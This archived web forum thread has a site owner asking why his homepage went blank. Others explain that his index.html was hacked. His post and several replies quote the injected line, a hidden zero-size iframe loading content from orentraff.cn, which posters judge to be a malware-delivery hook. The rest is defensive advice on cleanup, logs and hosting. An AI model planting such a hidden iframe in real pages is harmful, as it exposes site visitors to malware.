|
index issue
Hi everyone,
I recently had some problem accessing the main page of my website : it displayed a blank page instead of my usual welcome message. I found out that the culprit was the "index.html" file. Here's what its code showed : <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ --> I created my site four years ago and never altered it since. After such a long time I therefore don't remember writing this code, especially the "orentraff.cn" bit. After many attempts to understand why a blank page appeared I finally gave up : I erased the file and replaced it with a new one. It now works OK. Yet the problem could arise again at any time. 1 - Does anyone know what the code mentioned above (in particular orentraff.cn) means ? 2 - Does anyone know what happened to my index file ? Did it get corrupted or was my site hacked ? Many thanks in advance for your kind replies and help. Thierry |
Re: index issue
On Apr 22, 5:52*pm, ThL <Thierry@tlariviereATnordnetDOTfr> wrote:
> Hi everyone, > I recently had some problem accessing the main page of my website : it > displayed a blank page instead of my usual welcome message. > I found out that the culprit was the "index.html" file. Here's what its > code showed : > <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" > height="0" style="display:none"></iframe><!-- ~ --> > > I created my site four years ago and never altered it since. After such > a long time I therefore don't remember writing this code, especially the > "orentraff.cn" bit. > > After many attempts to understand why a blank page appeared I finally > gave up : I erased the file and replaced it with a new one. It now works > OK. Yet the problem could arise again at any time. > > 1 - Does anyone know what the code mentioned above (in particular > orentraff.cn) means ? orentraff.cn is a domain name. The code was calling something from another server into an invisible iframe. That something is probably malicious. > 2 - Does anyone know what happened to my index file ? Did it get > corrupted or was my site hacked ? You were hacked. Steve |
Re: index issue
Steve Pugh a écrit :
> On Apr 22, 5:52 pm, ThL <Thierry@tlariviereATnordnetDOTfr> wrote: >> Hi everyone, >> I recently had some problem accessing the main page of my website : it >> displayed a blank page instead of my usual welcome message. >> I found out that the culprit was the "index.html" file. Here's what its >> code showed : >> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" >> height="0" style="display:none"></iframe><!-- ~ --> >> >> I created my site four years ago and never altered it since. After such >> a long time I therefore don't remember writing this code, especially the >> "orentraff.cn" bit. >> >> After many attempts to understand why a blank page appeared I finally >> gave up : I erased the file and replaced it with a new one. It now works >> OK. Yet the problem could arise again at any time. >> >> 1 - Does anyone know what the code mentioned above (in particular >> orentraff.cn) means ? > > orentraff.cn is a domain name. The code was calling something from > another server into an invisible iframe. That something is probably > malicious. > >> 2 - Does anyone know what happened to my index file ? Did it get >> corrupted or was my site hacked ? > > You were hacked. > > Steve Oops... Thanks for your quick reply Steve. Next step : Now what ? Thierry |
Re: index issue
ThL wrote:
> Steve Pugh a écrit : <snip> >> You were hacked. > Oops... > Thanks for your quick reply Steve. > > Next step : > Now what ? Remove the line of code. Contact hosting company and find out how someone else could have gotten write access to your account. -- Take care, Jonathan ------------------- LITTLE WORKS STUDIO http://www.LittleWorksStudio.com |
Re: index issue
Jonathan N. Little a écrit :
> ThL wrote: >> Steve Pugh a écrit : > <snip> >>> You were hacked. > >> Oops... >> Thanks for your quick reply Steve. >> >> Next step : >> Now what ? Hi Johnathan, Thanks for your reply. > > Remove the line of code. I erased the file and replaced it with a new index.html one. > > Contact hosting company and find out how someone else could have gotten > write access to your account. > I first contacted my ISP, who host my site and asked them what the matter was. Unfortunately they were unable to give me any further info, apart from the fact that the "ghost" site was registered in China. I suppose the question of knowing "how someone got my write access" must have come to their minds, though they didn't mention it to me. Maybe they think I was not careful enough with my private passwords, which could be the case. One never knows. I'll ask them the question. Another question just popped : Are these hacking situations common ? If so, what do they use the hacked sites for ? Storing and exchanging illegal data ? Thierry |
Re: index issue
ThL wrote:
> Hi everyone, > I recently had some problem accessing the main page of my website : it > displayed a blank page instead of my usual welcome message. > I found out that the culprit was the "index.html" file. Here's what its > code showed : > <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" > height="0" style="display:none"></iframe><!-- ~ --> > > I created my site four years ago and never altered it since. After such > a long time I therefore don't remember writing this code, especially the > "orentraff.cn" bit. > > After many attempts to understand why a blank page appeared I finally > gave up : I erased the file and replaced it with a new one. It now works > OK. Yet the problem could arise again at any time. > > 1 - Does anyone know what the code mentioned above (in particular > orentraff.cn) means ? It means your page consisted of an invisible iframe of zero width and zero height set up to display the page at the address shown. I'm guessing, since the page was conspicuously set up not to be seen within yours, that it's meant to do nastry things to the computer of anyone who visits your page. > 2 - Does anyone know what happened to my index file ? Did it get > corrupted or was my site hacked ? Yes, someone in China hacked into your website. |
Re: index issue
ThL wrote:
> Jonathan N. Little a écrit : >> ThL wrote: >>> Steve Pugh a écrit : >> <snip> >>>> You were hacked. >> >>> Oops... >>> Thanks for your quick reply Steve. >>> >>> Next step : >>> Now what ? > > Hi Johnathan, > Thanks for your reply. >> >> Remove the line of code. > > I erased the file and replaced it with a new index.html one. >> >> Contact hosting company and find out how someone else could have >> gotten write access to your account. >> > I first contacted my ISP, who host my site and asked them what the > matter was. > Unfortunately they were unable to give me any further info, apart from > the fact that the "ghost" site was registered in China. > I suppose the question of knowing "how someone got my write access" must > have come to their minds, though they didn't mention it to me. > Maybe they think I was not careful enough with my private passwords, > which could be the case. One never knows. > I'll ask them the question. If this a ISP's webspace that came with internet connection account, we sometimes the little "Mom & Pop" ISPs are real amateurs with respect to hosting. Only time I had a hacked site was with an ISP personal webspace. They did not restrict access for their FTP account to users home folder (very basic security) and I even told them that once I FTPed in I could wander all over the server... This was back in the 90's. Get real hosting and this should not be a problem. > > Another question just popped : Are these hacking situations common ? If > so, what do they use the hacked sites for ? Storing and exchanging > illegal data ? Using your site to plant malware on unsecured browsers and gullible visitors. If these people who host your site don't know how your site was hacked (and you did not tell anyone else your FTP password) I'd find a better place to host your site. BTW, if you have not editied your page yet, look at the modification date to give you some idea when it was hacked... -- Take care, Jonathan ------------------- LITTLE WORKS STUDIO http://www.LittleWorksStudio.com |
Re: index issue
Harlan Messinger a écrit :
> ThL wrote: >> Hi everyone, >> I recently had some problem accessing the main page of my website : it >> displayed a blank page instead of my usual welcome message. >> I found out that the culprit was the "index.html" file. Here's what >> its code showed : >> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0" >> height="0" style="display:none"></iframe><!-- ~ --> >> >> I created my site four years ago and never altered it since. After >> such a long time I therefore don't remember writing this code, >> especially the "orentraff.cn" bit. >> >> After many attempts to understand why a blank page appeared I finally >> gave up : I erased the file and replaced it with a new one. It now >> works OK. Yet the problem could arise again at any time. >> >> 1 - Does anyone know what the code mentioned above (in particular >> orentraff.cn) means ? > > It means your page consisted of an invisible iframe of zero width and > zero height set up to display the page at the address shown. I'm > guessing, since the page was conspicuously set up not to be seen within > yours, that it's meant to do nastry things to the computer of anyone who > visits your page. > Thanks for your reply. Would you know how ? Thierry >> 2 - Does anyone know what happened to my index file ? Did it get >> corrupted or was my site hacked ? > > Yes, someone in China hacked into your website. |
Re: index issue
ThL wrote:
> Harlan Messinger a écrit : >> ThL wrote: >>> Hi everyone, >>> I recently had some problem accessing the main page of my website : >>> it displayed a blank page instead of my usual welcome message. [snip] >> It means your page consisted of an invisible iframe of zero width and >> zero height set up to display the page at the address shown. I'm >> guessing, since the page was conspicuously set up not to be seen >> within yours, that it's meant to do nastry things to the computer of >> anyone who visits your page. > > Thanks for your reply. > > Would you know how ? No. But clearly you have a security leak somewhere. |
Re: index issue
Harlan Messinger wrote:
> ThL wrote: >> Harlan Messinger a écrit : >>> ThL wrote: >>>> Hi everyone, >>>> I recently had some problem accessing the main page of my website : >>>> it displayed a blank page instead of my usual welcome message. > [snip] >>> It means your page consisted of an invisible iframe of zero width and >>> zero height set up to display the page at the address shown. I'm >>> guessing, since the page was conspicuously set up not to be seen >>> within yours, that it's meant to do nastry things to the computer of >>> anyone who visits your page. >> >> Thanks for your reply. >> >> Would you know how ? > > No. But clearly you have a security leak somewhere. As I said elsewhere in the thread, before to fix the page check the modification date, that can help you determine when the hack occurred. If it was not too long ago your ISP should have the FTP session logged. I would start there... -- Take care, Jonathan ------------------- LITTLE WORKS STUDIO http://www.LittleWorksStudio.com |
| All times are GMT. The time now is 04:40 AM. |
Powered by vBulletin®. Copyright ©2000 - 2013, vBulletin Solutions, Inc.
SEO by vBSEO ©2010, Crawlability, Inc.